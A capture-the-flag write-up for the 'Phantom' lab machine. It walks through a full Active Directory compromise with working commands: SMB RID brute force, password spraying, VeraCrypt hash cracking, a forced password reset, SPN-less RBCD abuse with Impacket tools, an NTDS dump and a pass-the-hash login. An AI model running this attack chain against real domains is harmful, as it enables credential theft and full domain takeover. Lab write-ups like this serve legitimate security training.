# Phantom - Writeup (Vulnlab & HTB)

## INFO: Ports and Services

```bash
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi
5985/tcp open  wsman
```

My initial recon made it clear.. i was dealing with a Windows Active Directory environment. Classic AD ports were open.

---

# FOOTHOLD

I used a RID brute force attack over SMB to dump valid domain accounts. This technique allowed me to enumerate user accounts by exploiting the predictable nature of RID sequences.

```bash
nxc smb phantom.vl -u 'shkz' -p '' --rid-brute
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755746102837/a645f308-b15b-4238-b887-02111409d81e.png align="center")

I got back a huge list of users, perfect for spraying later.

## SMB Guest Access

While poking around SMB shares as <mark>guest</mark>, I got a **PDF encoded in base64** inside <mark>Public</mark> folder.

```bash
smbclient.py DC.phantom.vl/'guest'@10.129.229.112
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755746522728/efb8a6f5-9f6e-445a-98e1-50d62a1b5dcc.png align="center")

```bash
echo "<snipped>...IDI1IDAgUgovSW5mbyAyNiAwIFIKL0lEIFsgPEM0QUQ2NUU5NEZCOTk3OTYx
MTU1Q0FGRkQ2QUMyQjUzPgo8QzRBRDY1RTk0RkI5OTc5NjExNTVDQUZGRDZBQzJCNTM+IF0KL0Rv
Y0NoZWNrc3VtIC8wQTM4N0RBQjYxNTBCMkRCMTg0MzJGMDJENzY2MDQxMwo+PgpzdGFydHhyZWYK
OTQxNAolJUVPRgo=" |base64 -d > out.pdf
```

Upon decoding the PDF, I found hardcoded credentials inside the file. This discovery was crucial for the next step, which involved a password spraying attack using the user list I had previously obtained.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755746902962/a0fe6ed9-a831-4443-935c-675702e67d23.png align="center")

```bash
nxc smb 10.129.229.112 -u users.txt  -p 'Ph4nt0m@5t4rt!' --continue-on-success --no-bruteforce
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755747790136/2a078046-5cb2-49e9-84cb-868a410ea8e9.png align="center")

We’ve got valid creds for user `ibryant`, the first thing I usually do is feed the data into BloodHound to get some context on the user we’re dealing with and where we stand. That way I can see where we might move laterally and get a general map of the AD.

```bash
bloodhound-python -u 'ibryant' -p 'Ph4nt0m@5t4rt!' -ns 10.129.229.112 -d 'phantom.vl' -c all --dns-tcp --zip
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755753363125/e908f108-ba6a-4bf9-826b-544b01b897c4.png align="center")

Meanwhile, I continued exploring the user’s shared resources over SMB, looking for additional information or files that could aid in further exploitation.

```bash
nxc smb 10.129.229.112 -u ibryant -p 'Ph4nt0m@5t4rt!' --shares
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755748001272/1989b870-7d4a-48c6-977a-2912ea9ef9a7.png align="center")

## SMB - ibryant

I connect to the shared resource called `Departments Share` via SMB:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755748227285/96e6d644-dd4a-4475-9fa0-a5e731809955.png align="center")

As a summary of all the folders, here’s what we’ve got:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755748679499/11eb33a7-bfed-4f1e-9697-449de3177377.png align="center")

## VeraCrypt Backup File

I navigated through the SMB share into the `IT\Backup` folder. Once inside, I listed the contents and found a file called `IT_BACKUP_201123.hc`. Judging by the extension, it’s most likely a **VeraCrypt/TrueCrypt container**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755749363021/0e05fb97-a03b-4d98-9801-5690bb44fb08.png align="center")

> The info given at the start as a hint about the machine says the following:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755749524139/83d74d54-34a2-4801-86fa-1d75454b63a5.png align="center")

Taking that hint as a base, I put together a basic **python script** that basically looks like this:

```python
#!/usr/bin/env python3

import itertools

company = "Phantom"
years = ["2024", "2023", "2022", "2021", "2020"]
specials = ["!", "@", "#", "$", "%"]

mutations = [
    company.lower(),
    company.upper(),
    company.capitalize(),
]

with open("wordlist.txt", "w") as f:
    for base in mutations:
        # word
        f.write(base + "\n")

        # years
        for y in years:
            f.write(base + y + "\n")

            # year + special
            for s in specials:
                f.write(base + y + s + "\n")

        # special
        for s in specials:
            f.write(base + s + "\n"
```

— wordlist.txt

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755750536801/342e00e5-bb35-4c08-91e9-6490faf4df14.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755750556900/2977f23e-dd01-4668-9a5b-4e85e688b86d.png align="left")

Finally, I ran hashcat with this custom wordlist against the backup file and managed to crack it, obtaining valid credentials.

```python
hashcat IT_BACKUP_201123.hc wordlist.txt -m 13721
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755750331137/d1da04a0-049b-4de9-8d20-3b74c6414be2.png align="center")

## Mounting Veracrypt Volume

Next step is mounting the volume we’ve got. You can install **VeraCrypt** with a GUI depending on your Linux distro, or just do it on Windows. In my case, running Arch, I fire it up, select the `.hc` file, and punch in the password we cracked.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755751245934/54924899-dc4b-4278-8211-42bfca25a594.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755751289706/cf88cdd2-06ac-4b4a-a4f0-aa85d92a438f.png align="left")

Once the disk is mapped, I mount it under `/mnt/ctf`.

```bash
sudo mount /dev/mapper/veracrypt1 /mnt/ctf
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755751533711/1351480e-fc20-4e4d-8602-6551daeaa23d.png align="center")

After digging through all the files and unpacking the `.tar.gz` and `.zip` archives, I run a recursive grep for keywords like “password” and boom!, I find some creds. I instantly throw them into a password spraying attack and land a valid access:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755752488952/36dabfcb-be44-4b18-acd1-249bd9c78cf6.png align="center")

# USER.txt

With that password, I run a spraying attack against the user list to see if we can score a new access.. and yes!, we get fresh creds for the `svc_sspr` account.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755753793107/d2838da7-2297-4817-b45f-567af020d4ce.png align="center")

Checking in BloodHound, I saw the account is part of the *<mark>Remote Management Users</mark>* group, so I attempted to connect.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755754264584/fac1148e-aada-4abf-8235-a861816f78ce.png align="center")

```bash
evil-winrm -i 10.129.229.112 -u SVC_SSPR -p 'gB6XTcqVP5MlP7Rc'
```

Finally, we grab the `user.txt` flag.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755754451079/d9ac3905-3aca-4004-bf5c-bbec74a2526d.png align="center")

# Root Path

Our user has rights to force a password change on three accounts:

* wsilva
    
* rnichols
    
* crose
    

So basically: these users are part of the *<mark>ICT Security</mark>* <mark>group</mark>, and that group has the **<mark>AddAllowedToAct</mark>** privilege on the `DC`. That means we can mess with the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to add our own machine account, opening the door to abuse via `RBCD`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755754888849/98b8d2d3-9c26-432d-8ad7-9e598ead819f.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755755044669/0b18a1d7-ffc2-42b3-89da-5fd5c14b4c75.png align="center")

## Changing CROSE password

As mentioned, we have the `ForceChangePassword` privilege, and I chose Crose to reset their password.

```bash
bloodyAD --host DC.phantom.vl -d phantom.vl -u 'SVC_SSPR' -p 'gB6XTcqVP5MlP7Rc' set password CROSE 'Pepe1234#'
```

## Abusing Resource-Based Constrained Delegation

RBCD allows us to escalate by editing the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute so another account can impersonate users via Kerberos S4U. Normally, you need a computer account, but if the domain blocks new machines (in this case 0 quota), you can exploit password/NT hash tricks to align with the TGT session key and still pull it off.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755755982281/7150ebd8-2f52-4a0c-bdb6-60256cb4df4a.png align="center")

### REFERENCES:

* [https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
    
* [https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users](https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users)
    

## STEP - 1

With `rbcd.py`, I passed a machine account using `-delegate-to`, and for the user, I handed over `CROSE`.

```bash
rbcd.py -delegate-to "DC$" -delegate-from "CROSE" -dc-ip 10.129.229.112 -action write "DC.phantom.vl/CROSE:Pepe1234#"
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755756976960/4570c9c7-88b4-41bc-9fd2-94e0eb83389c.png align="center")

## STEP - 2

I grabbed a TGT through an overpass-the-hash attack and extracted the TGT session key using `describeTicket.py`.

```bash
getTGT.py -hashes :$(pypykatz crypto nt 'Pepe1234#') 'phantom.vl'/'CROSE'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755757167687/307f931a-3492-42fc-be45-a640c3dea44e.png align="center")

```bash
describeTicket.py CROSE.ccache | grep 'Ticket Session Key'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755757370416/e60888fe-c143-4d7f-8b36-5ac6b2aac160.png align="center")

Then, I swapped it out with the domain user’s NT hash.

```bash
changepasswd.py -newhashes :b8c034f9036d97f34ef2ef18e9e75fc9 'phantom.vl'/'CROSE':'Pepe1234#'@'DC.phantom.vl'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755757830596/74b08636-9b2c-4957-a0e9-4728ae99bbd1.png align="center")

## STEP - 3

Using `S4U2Self` together with `u2u`, the CROSE account can request a service ticket for itself while impersonating the **Administrator**. From there, we pivot into `S4U2Proxy` to request a service ticket for the target machine that the user has delegation rights over.

```bash
export KRB5CCNAME=CROSE.ccache
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'CROSE'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755758087007/2f32a62f-11a2-4f83-a983-07ed62e8814f.png align="center")

## STEP - 4

Finally, I dumped the hash with netexec and achieved root access.

```bash
export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
nxc smb dc.phantom.vl --use-kcache --ntds --user Administrator
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755758798170/6a7100af-8c61-45c6-9b5e-83f69fc44ed6.png align="center")

```bash
evil-winrm -i 10.129.229.112 -u Administrator -H 'aa2abd9db4f5984e657f834484512117'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1755758873148/b7309b39-d11a-4759-ac89-6620e3666169.png align="center")

## PWNED!
